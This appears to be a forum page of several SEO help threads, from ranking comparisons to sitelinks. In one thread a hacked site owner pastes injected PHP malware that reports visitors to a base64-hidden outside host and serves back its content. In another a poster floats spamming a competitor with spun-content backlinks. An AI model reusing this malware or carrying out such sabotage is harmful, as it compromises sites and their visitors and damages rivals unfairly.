Website not moving?
-
We run a printing website www.fastprint.co.uk and have built a few decent tools such as
http://www.fastprint.co.uk/adobe-shortcut-mapper/
and decent infographics such as
http://www.fastprint.co.uk/blog/the-art-of-mixing-typefaces.html
and had a fair few decent links from website over the course of the last 1 1/2 but we do not seem to be moving very far?
If you take our site on sem rush (a decent percentage of our site traffic is through the above tools or decent blog posts so the number would be lower for E-commerce)
http://www.semrush.com/uk/info/fastprint.co.uk+(by+organic)?sort=volume_desc
in comparison to a few others
http://www.semrush.com/uk/info/banana-print.co.uk+(by+organic)]
http://www.semrush.com/uk/info/brunelone.com+(by+organic)
Especially this site
http://www.semrush.com/uk/info/instantprint.co.uk+(by+organic)
I just don't get what we are doing wrong?

How long has the site been up? What about IP?
Good content and links are how you build a good strong site, but there are many other factors at play here. It seems from SEM Rush that IP has been around a bit longer and might be ahead of you in terms of business development on the web (marketing, link building, outreach, etc.).
Are you focusing on one area of printing in particular? What do your goals look like?

Hi Bob,
I ran through quickly the site you're trying to rank, as well as the others, in particular InstantPrint.co.uk
The very first thing that stood out to me is the massive amount of links that InstantPrint.co.uk has versus your site FastPrint.co.uk. IP (InstantPrint.co.uk) has (according to the MozBar), 10,908 links from 83 domains, versus your site's 758 links from 115 domains.
Couple of things I can suggest right off the bat here:
-
Keywords ranked on: You've done a great job of pulling out the raw data from SEMRush for the keywords via which the traffic is coming in for. I noticed that according to the data from SEMRush, IP is getting a very large amount of traffic from the keyword 'business cards' ranking 3rd, versus FastPrint which doesn't seem to be ranked on that keyword. Have you pulled the entire list of keywords from SEMRush's crawl of IP and tracking them via Moz? That will be my first step here. To see which keywords IP is ranking above you on. Once you've tracked that for a couple of week and know where you stand, then the next step will come in. The first step I'd take is to identify what are the keywords most relevant to the business. Once I've done that, I've established the main baseline to measure the optimization work to be carried out.
-
Content creation: You've created some lovely tools and infographics, but a side-by-side comparison of the the two landing pages targeted at the keyword 'business cards': http://www.fastprint.co.uk/business-cards/ versus https://www.instantprint.co.uk/businesscards show that IP's landing page for 'business cards' has a Page Authority of 34 versus FastPrint's Page Authority of 24.
One particular item I noted was that IP has placed their key landing pages for keywords like 'business cards', flyers & leaflets', 'banners & POS' etc on their footer, meaning that throughout the entire site, the internal links are continually pointing back to the key landing pages, while FastPrint doesn't. I'd strongly suggest further optimizing the internal linkages pointing to the FastPrint key landing pages.
- Amount of Links: While it looks like IP has FastPrint beat in terms of the overall amount of links, I realized that the FastPrint site actually has more overall domains linking in to the site. I took a look at the backlinks pointing to IP and FP, and I think there's a lot to be learned here. If you take a in-depth look at the backlink report for IP, I think you'd find a massive amount of links that can also be pointing to FastPrint. Both businesses are in the same field, so I'd strongly suggest you take reference from the sites you've identified and figure out how they earned the backlinks they did, and apply the same to FastPrint.
Hope that helps!

Why google is catching my website late
Hello, I hope you all guys are doing great. Recently, I published my over my website and within almost 10 mins, it was indexed completely and I also personally checked it in google search console. The URL was indexed but the problem is, it does not appear in Google Search. Sometimes in search result I notice Google shows a result who is published 10-30 mins ago but this is not the case with my website. All articles just show in Google SERP after 1-2 days. What can be the reason behind this, although DA, PA is good (28-31).

Spammy Website Framed My Site & Stole Rankings
Hi One of the pages of my website was starting to gather some real traction in Google rankings and hit 3500 visitors per day. This is the page: http://www.naturallivingideas.com/drinking-apple-cider-vinegar-benefits/ On 11th January search traffic to this page fell to virtually 0. The rest of the site rankings were unaffected. Yesterday I tried searching for some of the main keywords I was ranking for and instead of my search listing, this was appearing: Image: http://www.naturallivingideas.com/wp-content/uploads/2017/01/weird-rankings.jpg It is in the exact position I was ranking in, but instead this evn . moe site has stolen my ranking. Upon opening the website, it is simply my original article page in an iframe. If you look at the source code of the offending website, you will see what I mean. Hopefully now you are getting a 403 forbidden error as my host blocked referrals from that site but they still hold my rankings. Has anyone ever seen this before? How was this done? And how can I get my ranking back? Thanks in advance, James

Should You Link Back from Client's Website?
We had a discussion in the office today, about if it can help or hurt you to link back to your site from one that you optimize, host, or manage. A few ideas that were mentioned: HURT:
White Hat / Black Hat SEO | | David-Kley
1. The website is not directly related to your niche, therefore Google will treat it as a link exchange or spammy link.
2. Links back to you are often not surrounded by related text about your services, and looks out of place to users and Search Engines. HELP:
1. On good (higher PR, reputable domain) domains, a link back can add authority, even if the site is not directly related to your services.
2. Allows high ranking sites to show users who the provider is, potentially creating a new client, and a followed incoming link on anchor text you can choose. So, what do you think? Test results would be appreciated, as we are trying to get real data. Benefits and cons if you have an opinion.2 -
How do you change the 6 links under your website in Google?
Hello everyone, I have no idea how to ask this question, so I'm going to give it a shot and hopefully someone can help me!! My company is called Eteach, so when you type in Eteach into Google, we come in the top position (phew!) but there are 6 links that appear underneath it (I've added a picture to show what I mean). How do you change these links?? I don't even know what to call them, so if there is a particular name for these then please let me know! They seem to be an organic rank rather than PPC...but if I'm wrong then do correct me! Thanks! zorIsxH.jpg

Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Competitors Developing Spammy Link For My Website
Well Guys there are lot of discussions in almost all the communities, blogs, forums about Post Penguin impact. Google says that if find that you're involved in any link building activities, we may penalize you. People out there have already started their developed links. But what if our competitors would have developed those links. Initially it was okay to develop one way links, I even developed lot of quality, but deliberately, links. around 95% links are placed manually, if return to some favor or money but all links looks natural. Most of the links I developed through content only, like articles, blog comments, PR submission, etc now really skeptical about the quality (after hearing lot of talks and reading n number of posts). Now, can I also submit my competitor's websites in 1000 topic directory (obviously not in any spammy directory), would it effect that website adversely? What if I spun an existing content and submit it into 500 article directories and give backlink to competitor site from using only one anchor text (which is obviously the main keywords - highest sales generating keyword) I look forward to some experts comments.
